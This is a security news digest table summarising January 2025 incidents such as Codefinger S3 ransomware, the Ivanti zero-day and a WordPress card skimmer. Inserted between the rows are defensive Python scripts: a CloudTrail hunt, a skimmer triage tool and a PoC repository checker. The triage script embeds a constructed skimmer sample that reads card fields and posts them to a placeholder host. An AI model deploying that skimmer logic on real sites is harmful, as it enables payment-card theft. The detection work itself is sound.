Daily Brief
Articles are listed below; the summaries in the table are machine-generated.
Total articles found: 12824
Checks for new stories every ~15 minutes
| Published | Source | Category | Title | Summary | Link |
|---|---|---|---|---|---|
| 2025-01-13 15:29:46 | bleepingcomputer | RANSOMWARE | Ransomware Targets Amazon S3 Buckets Using AWS Encryption Features | A new ransomware campaign uses AWS's Server-Side Encryption with Customer-Provided Keys (SSE-C) to encrypt objects in Amazon S3 buckets, then demands a ransom for the decryption key.
The campaign, attributed to a threat actor tracked as "Codefinger", has hit at least two victims, and the technique is simple enough that other criminals are likely to copy it.
With SSE-C the client supplies its own AES-256 key on every request; AWS encrypts the object with that key and does not retain it, so neither AWS nor the bucket owner can decrypt the data once the key is gone.
Using stolen AWS credentials, the attackers re-encrypted the data with keys only they hold and applied an S3 lifecycle policy marking the objects for deletion in seven days unless the ransom is paid.
Ransom notes dropped in the affected directories instruct victims to pay in Bitcoin to receive the key.
Halcyon, which discovered the campaign, has alerted Amazon; Amazon urges customers to enforce strict credential hygiene and key-management practices.
Recommended defenses are to deny SSE-C requests via IAM or bucket policy unless a workload genuinely needs them, to rotate and audit AWS access keys, and to minimize account permissions; note that because the key never reaches AWS, CloudTrail records the SSE-C write but cannot recover the key. | Details |
| 2025-01-13 14:03:46 | theregister | RANSOMWARE | AWS Native Encryption Exploited by New Ransomware Crew 'Codefinger' | Ransomware gang 'Codefinger' targets AWS S3 buckets, encrypting data with AWS's native server-side encryption with customer-provided keys.
The attackers demand a ransom for the AES-256 decryption key and threaten irreversible deletion of the data within seven days.
Codefinger reaches the storage with exposed or stolen AWS keys that carry read and write permissions on the target buckets.
Because the technique uses a legitimate AWS feature rather than malware, conventional detection and recovery have little to catch.
Victims are left a ransom note with Bitcoin payment details and a warning not to alter account settings or data.
AWS advises restricting the use of customer-provided keys on S3 buckets and stresses regular security audits and key rotation.
AWS also pointed to features that reduce credential exposure, such as short-lived credentials from IAM roles and signed API requests.
Abuse of AWS's own infrastructure for extortion presents new challenges in securing hosted data and preventing unauthorized access. | Details |
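As an added example serving both Codefinger items above (it is not code from either article, from Halcyon or from AWS), the following Python hunts a batch of CloudTrail records for the two actions the campaign chains, an SSE-C write followed by a short lifecycle expiration, and emits the bucket-policy statement that blocks the first. The sample records are constructed and abridged; the field names `additionalEventData.SSEApplied`, the `x-amz-server-side-encryption-customer-algorithm` request header and the `PutBucketLifecycle` event name follow the S3 data-event schema as documented, but confirm them against your own logs before relying on the filter.

```python
"""Hunt CloudTrail for Codefinger-style SSE-C abuse and emit the preventive policy.

Added example, not code from the articles, Halcyon or AWS.  Field names follow
the S3 CloudTrail data-event schema as documented (verify against your logs);
the sample records are constructed and abridged.
"""
from __future__ import annotations

import json

SSEC_HEADER = "x-amz-server-side-encryption-customer-algorithm"

# Constructed CloudTrail records: a normal SSE-KMS upload, an SSE-C overwrite
# by the same (stolen) identity, and a lifecycle rule that deletes in 7 days.
SAMPLE_EVENTS = [
    {"eventName": "PutObject",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/backup-svc"},
     "requestParameters": {"bucketName": "corp-finance", "key": "q4/notes.txt"},
     "additionalEventData": {"SSEApplied": "SSE_KMS"}},
    {"eventName": "PutObject",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/backup-svc"},
     "requestParameters": {"bucketName": "corp-finance", "key": "q4/ledger.xlsx",
                           SSEC_HEADER: "AES256"},
     "additionalEventData": {"SSEApplied": "SSE_C"}},
    {"eventName": "PutBucketLifecycle",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/backup-svc"},
     "requestParameters": {"bucketName": "corp-finance",
                           "LifecycleConfiguration": {"Rule": [
                               {"ID": "x", "Status": "Enabled", "Filter": {"Prefix": ""},
                                "Expiration": {"Days": 7}}]}}},
]


def is_ssec_write(event: dict) -> bool:
    """True for PutObject/CopyObject requests that carried a customer-provided key."""
    if event.get("eventName") not in {"PutObject", "CopyObject"}:
        return False
    params = event.get("requestParameters") or {}
    extra = event.get("additionalEventData") or {}
    return extra.get("SSEApplied") == "SSE_C" or SSEC_HEADER in params


def short_expirations(event: dict, max_days: int = 7) -> list[int]:
    """Expiration periods (days) of enabled lifecycle rules at or below max_days."""
    if event.get("eventName") != "PutBucketLifecycle":
        return []
    cfg = (event.get("requestParameters") or {}).get("LifecycleConfiguration") or {}
    rules = cfg.get("Rule") or []
    if isinstance(rules, dict):          # a single rule may be logged as a dict, not a list
        rules = [rules]
    return [r["Expiration"]["Days"] for r in rules
            if r.get("Status") == "Enabled"
            and isinstance((r.get("Expiration") or {}).get("Days"), int)
            and r["Expiration"]["Days"] <= max_days]


def hunt(events: list[dict]) -> list[str]:
    """One finding per suspicious event; both kinds from one identity is the full pattern."""
    findings = []
    for ev in events:
        who = (ev.get("userIdentity") or {}).get("arn", "?")
        params = ev.get("requestParameters") or {}
        bucket, key = params.get("bucketName", "?"), params.get("key", "")
        if is_ssec_write(ev):
            findings.append(f"SSE-C write s3://{bucket}/{key} by {who}")
        for days in short_expirations(ev):
            findings.append(f"lifecycle expiry in {days}d on s3://{bucket} by {who}")
    return findings


def deny_ssec_statement() -> dict:
    """Bucket-policy statement refusing any write that supplies a customer key.

    The Null operator with "false" matches requests in which the condition key
    IS present, i.e. the request carries the SSE-C algorithm header.  CopyObject
    also requires s3:PutObject, so one action covers both write paths.
    """
    return {
        "Sid": "DenyCustomerProvidedKeys",
        "Effect": "Deny",
        "Principal": "*",
        "Action": "s3:PutObject",
        "Resource": "arn:aws:s3:::corp-finance/*",   # bucket name is a placeholder
        "Condition": {"Null": {f"s3:{SSEC_HEADER}": "false"}},
    }


if __name__ == "__main__":
    for line in hunt(SAMPLE_EVENTS):
        print("ALERT", line)
    print(json.dumps({"Version": "2012-10-17", "Statement": [deny_ssec_statement()]}, indent=2))
```

Run it over a day of decompressed CloudTrail JSON (the `Records` array) and correlate the two finding types on the `userIdentity.arn`; an identity that both writes with SSE-C and shortens a lifecycle within minutes is the behaviour to page on. The Deny statement applies to every principal, including the bucket owner, so scope it to the buckets where no workload legitimately uses SSE-C.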
| 2025-01-13 13:38:16 | thehackernews | MALWARE | Hackers Target Aviatrix Controller Flaw to Inject Malware and Mine Crypto | A critical vulnerability in Aviatrix Controller, CVE-2024-50603 (CVSS 10.0), is being exploited to deploy backdoors and cryptocurrency miners.
The flaw is an OS command injection: several API endpoints pass unsanitized parameters into shell commands, giving unauthenticated remote code execution.
Patches are available in Aviatrix Controller versions 7.1.4191 and 7.2.4996.
In observed attacks the foothold was used to install the XMRig miner and the Sliver C2 framework, the latter suggesting the intrusions are meant to persist beyond mining.
Wiz estimates that about 3% of cloud enterprise environments run Aviatrix Controller and that in roughly 65% of those the controller has a lateral-movement path to administrative cloud control-plane permissions, so a compromised controller can escalate into the cloud account itself.
Wiz recommends applying the patches immediately and removing public exposure of the Aviatrix Controller. | Details |
| 2025-01-13 12:07:07 | thehackernews | MALWARE | Critical Ivanti Flaw Exploited by Multiple Malware Variants | A critical vulnerability in Ivanti Connect Secure appliances has been exploited as a zero-day since mid-December 2024.
Tracked as CVE-2025-0282 (CVSS 9.0), the flaw is a stack-based buffer overflow that allows unauthenticated remote code execution.
Google-owned Mandiant has observed several malware families deployed through it, including variants of the SPAWN ecosystem and two new families, DRYHOOK and PHASEJAM.
Multiple threat groups are believed to be exploiting the flaw, including the China-linked cluster UNC5337.
The tooling and the speed of exploitation point to coordinated, well-resourced actors.
Organizations running Ivanti Connect Secure should patch or apply mitigations immediately; because exploitation predates the patch, appliances should also be checked for signs of compromise rather than assumed clean once updated. | Details |
| 2025-01-13 11:31:26 | thehackernews | RANSOMWARE | Escalating Ransomware Threats Target VMware ESXi Servers in 2024 | Ransomware attacks on VMware ESXi servers surged in 2024, with the average ransom demand reaching $5 million.
Roughly 8,000 ESXi hosts are directly exposed to the internet, a significant attack surface.
Most variants hitting these servers derive from the leaked Babuk source code and are tuned to evade security tooling.
Initial-access brokers monetize footholds by selling them on to ransomware operators, widening the pool of attackers.
The risk is architectural: vCenter centrally manages the hosts, so compromising it (or the ESXi management interfaces) gives an attacker control over every host it manages and the virtual machines on them.
Attackers use hybrid encryption, encrypting VM files with a symmetric cipher and wrapping the per-file keys with an attacker-held public key, so nothing is recoverable without the attacker's private key and victims are pressured to pay.
Organizations are advised to harden ESXi through regular vulnerability testing and programs such as continuous threat exposure management (CTEM). | Details |
| 2025-01-13 10:35:39 | theregister | CYBERCRIME | Nominet Investigates Network Breach Linked to Ivanti Zero-Day | Nominet, which operates the .uk domain registry, is investigating unauthorized access to its network gained through a zero-day vulnerability in Ivanti's VPN software.
So far it reports no evidence of data theft, leaks, or backdoors, and its domain registration and DNS systems remain fully operational.
Nominet has engaged external cybersecurity experts to assist with the investigation and has tightened controls, including restricting VPN access.
The zero-day, CVE-2025-0282, has been exploited since December and affects Ivanti Connect Secure, Policy Secure and Neurons for ZTA gateways; patches are being rolled out.
The incident is part of a wave of attacks by UNC5337, a cluster Mandiant ties to the suspected China-nexus group UNC5221.
Mandiant, assisting Ivanti with the analysis, has observed both known and new malware deployed through the flaw.
Nominet has advised all users of the affected Ivanti software to apply the patches immediately. | Details |
| 2025-01-13 06:43:33 | thehackernews | MALWARE | Stealthy WordPress Skimmer Targets E-Commerce Payment Details | Cybersecurity researchers have uncovered a credit card skimmer campaign targeting WordPress e-commerce sites.
The malicious JavaScript is stored in the WordPress database (the wp_options table, as a block widget) rather than in theme or plugin files, so file-integrity scanners do not see it.
The script activates only on checkout pages, where it hijacks the existing payment fields or injects a fake credit card form.
It captures card numbers, expiration dates, CVV codes, and billing information, encrypts the data with AES-CBC and Base64-encodes it before sending it out, so the traffic does not look like card data in transit.
Stolen data is sent to attacker-controlled servers whose domains are listed in the report.
The report also notes a separate, similar campaign that injected JavaScript to create fake payment forms on checkout pages and in that case harvested additional customer data (names, addresses, phone numbers) through Magento APIs.
It further mentions an unrelated phishing campaign abusing PayPal, part of the broader trend of financially motivated attacks. | Details |
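As an added example (not code from the article or from the researchers who found the skimmer), the Python below triages `wp_options` rows for a database-resident checkout skimmer of the kind described: it scores only rows that embed a `<script>`, weighting a checkout gate, card-field selectors, Base64/AES helpers and an outbound call to an external host. The rows are constructed, the placeholder host `example.invalid` is mine, and the weights and threshold are a starting point to tune, not a signature.

```python
"""Triage wp_options rows for a database-resident checkout skimmer.

Added example, not code from the article or from the researchers.  The rows are
constructed; the malicious sample mimics the behaviour the article describes
(stored as a widget, gated on 'checkout', reads card fields, AES-encrypts and
Base64-encodes, posts to an external host).  Weights and threshold are mine.
"""
from __future__ import annotations

import re

# Candidate rows would normally come from (table prefix wp_ assumed):
#   SELECT option_name, option_value FROM wp_options WHERE option_value LIKE '%<script%';
# Here they are embedded so the script runs offline.
MALICIOUS_WIDGET = (
    "<!-- wp:html --><script>"
    "if(location.href.includes('checkout')&&!location.href.includes('cart')){"
    "document.querySelector('#place_order').addEventListener('click',function(){"
    "var d={num:document.querySelector('#card-number').value,"
    "cvv:document.querySelector('#card-cvc').value,"
    "exp:document.querySelector('#card-expiry').value};"
    "var p=CryptoJS.AES.encrypt(JSON.stringify(d),'k').toString();"
    "fetch('https://example.invalid/collect',{method:'POST',body:btoa(p)});});}"
    "</script><!-- /wp:html -->"
)
SAMPLE_ROWS = [
    {"option_name": "siteurl", "option_value": "https://shop.example.invalid"},
    {"option_name": "widget_block",      # benign third-party script tag
     "option_value": '{"2":{"content":"<script src=\'https://example.invalid/analytics.js\'></script>"}}'},
    {"option_name": "widget_block",      # the skimmer
     "option_value": '{"3":{"content":"' + MALICIOUS_WIDGET + '"}}'},
    {"option_name": "widget_text",       # mentions checkout but carries no script
     "option_value": "<p>Free shipping on checkout over $50</p>"},
]

# indicator name -> (pattern, weight)
INDICATORS: dict[str, tuple[re.Pattern[str], int]] = {
    "checkout-gate": (re.compile(r"checkout", re.I), 2),
    "card-fields":   (re.compile(r"card[-_ ]?(number|num|cvc|cvv|expir)|\bcv[cv]\b", re.I), 2),
    "encoding":      (re.compile(r"\b(btoa|atob|CryptoJS|AES)\b"), 1),
    "exfil-call":    (re.compile(r"\b(fetch|XMLHttpRequest|sendBeacon)\b|new\s+Image\b"), 1),
    "external-url":  (re.compile(r"""https?://[^\s'"<>]+"""), 1),
}


def score_option(value: str) -> tuple[int, list[str]]:
    """Score a single option_value; plain HTML or text without a script never triggers."""
    if "<script" not in value.lower():
        return 0, []
    hits = [name for name, (rx, _) in INDICATORS.items() if rx.search(value)]
    return sum(INDICATORS[h][1] for h in hits), hits


def triage(rows: list[dict], threshold: int = 4) -> list[dict]:
    """Return the rows whose score reaches the threshold, with the indicators that fired."""
    flagged = []
    for row in rows:
        score, hits = score_option(row["option_value"])
        if score >= threshold:
            flagged.append({"option_name": row["option_name"],
                            "score": score, "indicators": hits})
    return flagged


if __name__ == "__main__":
    for hit in triage(SAMPLE_ROWS):
        print(f"{hit['option_name']}: score {hit['score']} ({', '.join(hit['indicators'])})")
```

A legitimate analytics or chat widget scores low (one external URL), while the skimmer trips every indicator; review anything at or above the threshold by hand, and pull the row's full value, since WordPress serializes widget content and the script may be split across PHP-serialized fields.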
| 2025-01-13 06:02:55 | thehackernews | CYBERCRIME | Security Firm Hijacks 4,000 Backdoors Via Expired Domains | watchTowr Labs took control of more than 4,000 web backdoors by registering expired domain names that threat actors had used for them, at as little as $20 per domain.
More than 40 domains previously used for command-and-control (C2) were registered and then sinkholed in collaboration with the Shadowserver Foundation.
Beaconing from the compromised systems pointed to breaches in government and academic networks in countries including Bangladesh, China, Nigeria, South Korea, and Thailand.
The backdoors, mostly web shells such as c99shell and r57shell, give full control over the host: file operations, code execution, and deployment of further payloads.
Some of the web shells were themselves backdoored by their authors, so the systems they ran on also phoned home to a third party the original attacker knew nothing about.
Earlier watchTowr research found the same pattern with a retired .mobi WHOIS server domain: registering one expired domain drew queries from more than 135,000 systems that still trusted it.
The hijacked domains saw traffic from government, military, and educational networks worldwide, showing that attackers abandon infrastructure as carelessly as defenders leave web shells in place. | Details |
| 2025-01-13 05:32:25 | theregister | DATA BREACH | Multiple Data Breaches and GDPR Violations Uncovered Across Platforms | A reported hack of location-data broker Gravy Analytics potentially exposed the movement histories of millions of people, data collected through the advertising ecosystem and sold on.
The EU General Court ordered the European Commission to pay a German citizen €400 for unlawfully transferring his personal data to the U.S. via a "Sign in with Facebook" option on a Commission website, in breach of EU data-protection rules.
Cisco issued a security update for Identity Services Engine ahead of Microsoft's February 2025 enforcement of strong certificate mapping for certificate-based authentication (KB5014754).
FunkSec, a new ransomware group, is suspected of inflating its victim count and of using AI assistance to write its malware.
A breach at cannabis retailer Stiiizy exposed customers' personal data after criminals compromised its point-of-sale vendor.
CrowdStrike identified a phishing campaign in which attackers impersonate its recruiters and send fake job offers that deliver malware.
Location records tied to users of apps including Tinder, Grindr, and Microsoft 365 reportedly appear in the Gravy Analytics data, harvested through the real-time-bidding advertising pipeline rather than from the apps themselves. | Details |
| 2025-01-12 19:31:44 | bleepingcomputer | CYBERCRIME | Cybercriminals Exploit iMessage to Conduct Smishing Attacks | Cybercriminals are using smishing tactics to bypass Apple iMessage's phishing protection by encouraging users to reactivate disabled links in phishing texts.
iMessage automatically disables links from unknown senders to prevent phishing, but replying to these messages or adding the sender to contacts re-enables the links.
Recent smishing campaigns have involved messages pretending to be from USPS or regarding unpaid road tolls, asking recipients to reply with "Y" to activate the links.
The tactic has grown markedly over the past year, with a sharp rise since the summer.
Attackers exploit the familiarity of replying "Y" or "STOP" to text messages: the reply re-enables the links and also confirms to the sender that the number is live and its owner responsive.
Savvy users often recognize these messages, but more vulnerable people, including the elderly, may not, risking theft of personal and financial information.
Users are advised never to reply to such messages and to verify any claim by contacting the organization through its official channels rather than the links in the text. | Details |
| 2025-01-11 16:46:30 | bleepingcomputer | MISCELLANEOUS | IRS Recommends Identity Protection PINs to Thwart Fraud | The IRS has reintroduced its Identity Protection Personal Identification Number (IP PIN) program to enhance security and combat fraudulent tax returns.
Taxpayers are urged to obtain an IP PIN, a six-digit number reissued each year that must accompany the return, so that a return filed under their Social Security number without it is rejected.
Despite a temporary shutdown in December for maintenance, the program restarted this week, encouraging immediate enrollment due to heightened risks.
Following the National Public Data breach exposing over 100 million Social Security Numbers, the implementation of an IP PIN has become critical.
The IRS flagged 2.8 million suspicious tax returns last year through its Taxpayer Protection Program, underlining the importance of preventive measures like the IP PIN.
Taxpayers can apply for the IP PIN by registering online via the IRS website or, if eligible, requesting through Form 15227 or at a Taxpayer Assistance Center.
Enrollment continues automatically, with a new PIN issued each year; the IRS advises enrolling early in the calendar year, before a fraudster can file a return using the stolen identity. | Details |
| 2025-01-11 15:25:34 | bleepingcomputer | MALWARE | Deceptive GitHub Exploit Distributes Infostealer via Fake PoC | A fake proof-of-concept exploit for CVE-2024-49113, the Windows LDAP flaw dubbed "LDAPNightmare", was found on GitHub delivering infostealer malware.
Posing as a legitimate exploit, the malware exfiltrates sensitive data from anyone who runs it to an external FTP server.
The malicious repository was a fork of the legitimate SafeBreach Labs PoC in which the Python source was replaced with a 'poc.exe' binary, aimed at GitHub users searching for ways to test the vulnerability.
When run, 'poc.exe' drops further scripts that collect extensive system and network information and upload it to the attackers.
GitHub has been used the same way before to host malware disguised as exploits.
To reduce risk, verify the provenance of a repository, read the code before executing anything, treat a compiled binary in a source-level PoC as a red flag, and check binaries against services such as VirusTotal.
Trend Micro, which reported the campaign, notes that the tactic remains common and urges vigilance among GitHub users. | Details |
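As an added example of the pre-execution check the item above recommends (not code from the article, Trend Micro or SafeBreach), the Python below walks a cloned PoC checkout, hashes every file and flags compiled binaries and packer markers, which a source-level PoC for a protocol bug has no reason to ship. The hashes are what you look up on VirusTotal before running anything. The demo repository it builds in a temporary directory is constructed, and the `UPX!` marker check is a common heuristic, not an exhaustive packer test.

```python
"""Pre-execution triage of a cloned proof-of-concept repository.

Added example, not code from the article, Trend Micro or SafeBreach.  It hashes
every file in a checkout and flags compiled binaries and packer markers; the
hashes are what you look up on VirusTotal before running anything.  The demo
repository is constructed.
"""
from __future__ import annotations

import hashlib
import tempfile
from pathlib import Path

BINARY_SUFFIXES = {".exe", ".dll", ".scr", ".bin", ".so", ".pyc", ".msi"}
LAUNCHER_SUFFIXES = {".ps1", ".bat", ".cmd", ".vbs", ".hta"}


def classify(path: Path, data: bytes) -> list[str]:
    """Cheap static flags.  'UPX!' is a common packer section marker (heuristic, not exhaustive)."""
    flags = []
    suffix = path.suffix.lower()
    if suffix in BINARY_SUFFIXES:
        flags.append("binary-extension")
    if suffix in LAUNCHER_SUFFIXES:
        flags.append("script-launcher")
    if data[:2] == b"MZ":
        flags.append("pe-header")
    if data[:4] == b"\x7fELF":
        flags.append("elf-header")
    if b"UPX!" in data[:4096]:
        flags.append("upx-marker")
    return flags


def triage_repo(root: Path) -> list[dict]:
    """Hash and classify every tracked file under root, skipping .git internals."""
    report = []
    for path in sorted(p for p in root.rglob("*") if p.is_file() and ".git" not in p.parts):
        data = path.read_bytes()
        report.append({"path": path.relative_to(root).as_posix(),
                       "sha256": hashlib.sha256(data).hexdigest(),
                       "flags": classify(path, data)})
    return report


def suspicious(report: list[dict]) -> list[dict]:
    """Entries that should stop you before execution: anything compiled or packed."""
    hard = {"binary-extension", "pe-header", "elf-header", "upx-marker"}
    return [r for r in report if hard & set(r["flags"])]


def build_demo_repo(root: Path) -> Path:
    """Constructed stand-in for a cloned PoC: a Python script, a README and a stray packed EXE."""
    (root / "README.md").write_text("# LDAP PoC (constructed demo)\n")
    (root / "poc.py").write_text("# placeholder PoC source\nprint('ldap test')\n")
    fake_exe = b"MZ" + b"\x90" * 256 + b"UPX!" + b"\x00" * 64   # PE magic + packer marker
    (root / "poc.exe").write_bytes(fake_exe)
    return root


def demo() -> list[dict]:
    """Build the constructed repository in a temp dir and triage it."""
    with tempfile.TemporaryDirectory() as tmp:
        return triage_repo(build_demo_repo(Path(tmp)))


if __name__ == "__main__":
    for entry in demo():
        mark = "!!" if entry["flags"] else "  "
        print(mark, entry["sha256"][:16], entry["path"], ",".join(entry["flags"]))
```

Point `triage_repo` at a real checkout (for example `triage_repo(Path("./LDAPNightmare"))`) and compare the result with the upstream repository: a fork that replaces `.py` files with an `.exe`, or adds a `.ps1` or `.bat` launcher, has changed the nature of the project, whatever its README says.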
| 2025-01-11 07:56:04 | thehackernews | CYBERCRIME | Microsoft Initiates Legal Action Against AI Abuse by Hackers | Microsoft is suing a foreign-based hacking group for abusing its Azure OpenAI Service to generate harmful content.
The group built software to bypass Microsoft's AI safety controls and sold the resulting access to others.
The defendants scraped exposed customer API keys from public websites and used them to drive the service past its content filters.
Court filings state that the defendants used stolen Azure API keys and supplied customers with detailed instructions for generating prohibited content.
The group systematically stole API keys from several U.S. companies and developed tooling such as the client "de3u" to abuse Microsoft's AI services.
Microsoft has revoked the stolen access, seized a website central to the operation, taken down parts of the group's proxy infrastructure, and added countermeasures against repeat abuse. | Details |
| 2025-01-11 06:50:03 | thehackernews | CYBERCRIME | U.S. DoJ Indicts Russians for Operating Crypto Laundering Services | The U.S. Department of Justice has indicted three Russian nationals for running the cryptocurrency mixing services Blender.io and Sinbad.io, used to launder cybercrime proceeds.
Roman Vitalyevich Ostapenko and Alexander Evgenievich Oleynik were arrested on December 1, 2024; a third defendant, Anton Vyachlavovich Tarasov, remains at large.
The mixers obscured the origin of cryptocurrency linked to crimes including ransomware and wire fraud.
Blender.io was sanctioned by the U.S. Treasury in 2022 for laundering funds stolen by the North Korea-linked Lazarus Group and is believed to have relaunched as Sinbad.io after shutting down.
In late 2023 international law enforcement seized Sinbad.io's online infrastructure, describing it as a key facilitator of global cybercrime.
If convicted, the defendants face up to 20 years for conspiracy to commit money laundering and up to five years for operating an unlicensed money-transmitting business.
The article also notes, citing Chainalysis, broader efforts against cryptocurrency scams that have cost more than 1,100 victims over $25 million. | Details |
| 2025-01-10 21:49:21 | theregister | NATION STATE ACTIVITY | Chinese Spies Hack U.S. Treasury, Access Real Estate Data Near Military | Chinese cyber-spies infiltrated the U.S. Treasury Department to obtain documents related to real-estate transactions near American military bases.
The espionage targeted officials from the Committee on Foreign Investment in the U.S. (CFIUS), which assesses foreign investments for national security risks.
Recent expansion of the committee's authority allows for additional scrutiny of property purchases or leases near U.S. military sites due to concerns over potential Chinese spying.
The stolen documents were unclassified but could still give Chinese intelligence insight into which transactions draw scrutiny.
The intrusion came through a third-party service provider, the remote-support vendor BeyondTrust, whose compromised API key let the attackers reach several Treasury user workstations.
The Treasury says it has significantly expanded its cyber-defense capabilities over the past four years in response to ongoing threats.
China denies the allegations as tensions between Washington and Beijing continue to escalate.
Congress has been notified of the incident amid broader concern about Chinese cyber operations against American infrastructure and telecommunications. | Details |